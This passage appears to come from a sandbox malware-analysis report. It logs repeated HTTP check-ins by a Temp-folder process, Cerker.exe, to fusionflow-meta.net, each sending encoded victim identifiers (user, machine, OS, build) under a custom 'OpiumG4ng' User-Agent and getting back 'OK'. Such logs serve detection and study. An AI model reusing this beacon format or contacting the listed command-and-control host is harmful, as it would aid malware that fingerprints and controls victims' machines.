2024-08-31 20:44:14 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:15 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6MKDB1nsFAKlRbHSPqOW3rZhlTvov%2BqV6eZkfNduq%2B8iHr4FgoeuJ9iqO%2Bc4Xz68X5iGswGAgPW6sbyRGdRXUy%2BK%2BtXfDd3yGM2TkpnnisHvg0TnYcALq7OoolA%2BEWu7wUy98sMv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb81fc1142e3-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:15 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	50007	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:16 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:16 UTC	682	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n786ubVOVfTj8I%2FySo5ZbNkSO4Ccza1ezbnZdo1BnqiIbd2JjM0XkZNn2yRpkHqhPIFkz8CUvIzPo58qDNyzzoYNWnIOhzsyzsHggqLJmXgzLflNaCJ2KSAYwnSHQlLyaOMyI0dF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb897c8c0f74-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:16 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	50009	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:17 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:18 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AEme%2F6NVbpnbFsMbRHr8Vb2rNydq%2BjsKWGDyrRhJQKYUICKHtWJ0ZHZXDPszYfyYX93ykDODFqkNPbGfhhqA3Fr4n%2Fs8dHTtOJDy3UbYQQ%2BNYPIX819MgQQeK0FBnizE%2BUO6R3DZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb929a0a1795-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:18 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	50011	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:18 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:19 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1mOzAKWNN5NlAqPJO6Il6LZxAJX%2BJ%2BWmCaTnyhccpUtK%2F%2FmZIVd9HSA7NviPZcBxJpRkF4Oh6msHV7FjRGzL6LgI4vH7oJrtNl0lRpTeBiBxnGShJxhBCSdDhwbdwsvhgdWTSyqf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb9a6c8a5e60-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:19 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	50014	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:20 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:20 UTC	698	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lRGp6Q5JRztjNQBeFWl5%2B6%2Bh%2BFMeyj9HDyMQjqG2x2DR%2FT0Nlli7CUdYQ6%2BzaIu%2F%2B%2Bt0fUMcmOjjYnEhg3XHfSMBB4kJTPPu0kd6O5MjM5GQ%2FsJyGNmyy6vhDHmCVHNJVUEkRovW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdba1cf867ca5-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:20 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	50017	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:21 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:22 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VKR%2BLNeB9zoTKjIwHoPlh4215Wzpvme%2FkueAJBeY2CYzpPC2zo4NYgub%2BZk3Rgt%2FGsiK7eTgAIBawc7VBfjyladEneLPQNVfEdzfgMS13Jh4JxiQRfFUDYaQGQOqCvNTsR6Xf8o1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdba9e8fc4340-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:22 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	50019	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:22 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:23 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TKCxeTrb8grAD5NTIyvJVPN7z%2FavcvbhFaxQHzpmKsnk1UU2lwe4zLhNe1FLyMkFZmzExiK08dBQ9CE9eRYGn9m%2FTU1QVQXqUEEbQsA0XTYWv4GhZaZON6D4dDRKcPnBuNiGcWej"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdbb32c7572b7-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:23 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	50021	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:24 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:24 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y7suEJDhuoNOPn0vezBn9CFoacIaLmP1tgFDexyXpCZs%2BhtrS3acECLjwM59aixv0jdGyFKSnPYcIGUqZ%2BmJrou6ZxvHGObwEwWkpq8U9wYLbKYpzov1Sf%2FBeuv0nvq%2Fno55Zmiw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdbba9d6a7ca0-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:24 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	50023	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:25 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:25 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hvgBX6VM7ggbbVKPKkMBk2iMeTq12o3xTWeJNrnLPiAOTuVVcAaIKkNq0PNGOXhjOU97la%2F1czgRBuGPTF3YpCPS2e9DRAH%2BgG3sjc94RoxhfQGWc%2BzCxB1%2Bea%2FhTX3QZRtvETfy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdbc2bbc38c8f-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:25 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	50025	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:26 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:27 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBA36zDlweY%2FGVbubkPKlRgXlrvG25%2B%2FagQvhHHIflaQUUa1fb%2FEMRdAKaCNTWM91dE7jiYm78JU%2FCgkAvutuSQ%2FYszr6GkR0EG2lPruBoPcOojr1pgZYo6uayWUJKGHSc2oSzG5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdbca3ee543dd-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:27 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	50027	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:27 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:28 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TxFFH5rERyuChLv3MjA%2B14MI6ZWyzcdw3Q%2F4S5%2B0bQtalspgxwUhxZNlGPPMLaeep%2Fc8Owqa9AhQ8yufB2Yh5gCkKKT%2F0jmBGksebvowlXgO12lC8SFKBy6aezn%2B2Co2BKJ6pxdV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdbd1ec6f436d-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:28 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	50028	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:29 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:29 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FeiuhPzkYX1IPDwTp8Y%2FGMCr44xf%2BF9Xv65SZlG06mLK09sk3DwOd%2BJ39frQY2NVta8qfVzmXysNjJUOCxBJ5e5yrSrST7GbwYT5qrKIn5WZ9knvmwReNu3dsQxpCzGryevGNtj2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdbda09960f87-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:29 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	50031	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:30 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:30 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fP2xItABfzw4kTf6VgqSvIltYlL7SneYdbW0%2FpLfbz4vbB0pohFa45dILEdCLpjhu6E4zcIiRP0%2FnnL6ZfL2%2FHwbjNxeZX58GJ29YdfTQqFtJpG%2BMENG43TY4Dop5coY9XLhWIvB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdbe20a4c0f73-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:30 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	50035	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:31 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:32 UTC	682	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d3CfRhZrnNHc3oSaGQjw9kIM%2BXzlJqH43CGBh4Y2YNeCXTOeTv9bRUzvFk73oe4gspyhooP97rogIrpJlcxieP9pWxFOInoLjfmWMrVqJadLS1BUT0RcoqXHe3as2Tw4i2GgOZ1T"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdbe9c9ca4308-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:32 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	50037	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:32 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:33 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gCWVwwbD9inBnQiC4%2FS4fQzN27WjQX2aFBE9xDIX%2FZAFxfi6vEJ7Jh1BXr9g2u%2B02LZUgW2b2JnWOSetUqrfDjDlnnjqSl299WNMyjfbAcOXgpe3aAO%2F7YIVEYla1CvaRPm4AjfH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdbf0bcf04391-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:33 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	50039	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:33 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
